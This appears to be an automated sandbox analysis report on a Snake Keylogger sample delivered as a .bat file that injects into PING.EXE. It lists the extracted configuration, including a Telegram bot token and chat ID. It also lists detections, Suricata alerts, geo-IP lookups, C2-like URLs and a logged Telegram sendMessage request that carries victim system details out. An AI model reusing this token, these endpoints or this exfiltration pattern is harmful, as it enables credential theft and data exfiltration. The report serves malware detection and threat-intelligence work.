Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat_id": "2135869667", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: SOA Since OCT DEC 241738316681530012900.bat	ReversingLabs: Detection: 31%
Source: SOA Since OCT DEC 241738316681530012900.bat	Virustotal: Detection: 45%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 8.2.PING.EXE.6900000.1.raw.unpack	String decryptor: 8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI
Source: 8.2.PING.EXE.6900000.1.raw.unpack	String decryptor: 2135869667
Source: 8.2.PING.EXE.6900000.1.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:58075 version: TLS 1.2

Source:	Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 00000008.00000002.3332146914.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdbhP source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdb source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 068DF881h	8_2_068DF5DC
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 068DF0C5h	8_2_068DF114
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 068DF0C5h	8_2_068DEF2A
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 068DFCD9h	8_2_068DFA20
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F48E28h	8_2_06F48B58
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F47A5Dh	8_2_06F47720
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4FC28h	8_2_06F4F958
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4A9B8h	8_2_06F4A6E8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F45179h	8_2_06F44ED0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F47571h	8_2_06F472C8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4E570h	8_2_06F4E2A0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F42151h	8_2_06F41EA8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F47119h	8_2_06F46E70
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F44D21h	8_2_06F44A78
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4C548h	8_2_06F4C278
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F41CF9h	8_2_06F41A50
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4A520h	8_2_06F4A250
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F448C9h	8_2_06F44620
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F46CC1h	8_2_06F46A18
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4E0D8h	8_2_06F4DE08
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F492C0h	8_2_06F48FF0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4EEA0h	8_2_06F4EBD0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F45E81h	8_2_06F45BD8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F42E59h	8_2_06F42BB0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4CE78h	8_2_06F4CBA8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F45A29h	8_2_06F45780
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4AE50h	8_2_06F4AB80
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F42A01h	8_2_06F42758
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4EA08h	8_2_06F4E738
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F455D1h	8_2_06F45328
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4C9E0h	8_2_06F4C710
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F425A9h	8_2_06F42300
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F40B99h	8_2_06F408F0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4D7A8h	8_2_06F4D4D8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4B780h	8_2_06F4B4B0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F40741h	8_2_06F40498
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F49758h	8_2_06F49488
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4F338h	8_2_06F4F068
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F402E9h	8_2_06F40040
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4D310h	8_2_06F4D040
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F462DBh	8_2_06F46030
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4B2E8h	8_2_06F4B018
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F432B1h	8_2_06F43008
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F418A1h	8_2_06F415F8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4C0B0h	8_2_06F4BDE0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F46869h	8_2_06F465C0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F44471h	8_2_06F441C8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4A088h	8_2_06F49DB8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F41449h	8_2_06F411A0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4DC40h	8_2_06F4D970
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F40FF1h	8_2_06F40D48
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4BC18h	8_2_06F4B948
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F49BF0h	8_2_06F49920
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 4x nop then jmp 06F4F7A8h	8_2_06F4F500

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:58075 -> 149.154.167.220:443

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.8:58057 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2014/03/2025%20/%2013:48:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49688 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58058 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58060 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:58063 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49685 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49691 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:58067 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2014/03/2025%20/%2013:48:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 10:42:56 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: PING.EXE, 00000008.00000002.3328916486.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000002.00000002.1035865140.000001BED49E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 0000000C.00000002.2861733489.0000021948E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000002.00000002.991277571.000001BEBC741000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000002.00000002.991277571.000001BEBC741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a
Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PING.EXE, 00000008.00000002.3328916486.0000000004575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PING.EXE, 00000008.00000002.3328916486.0000000004570000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.12.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000C.00000003.1208366624.0000021948C70000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
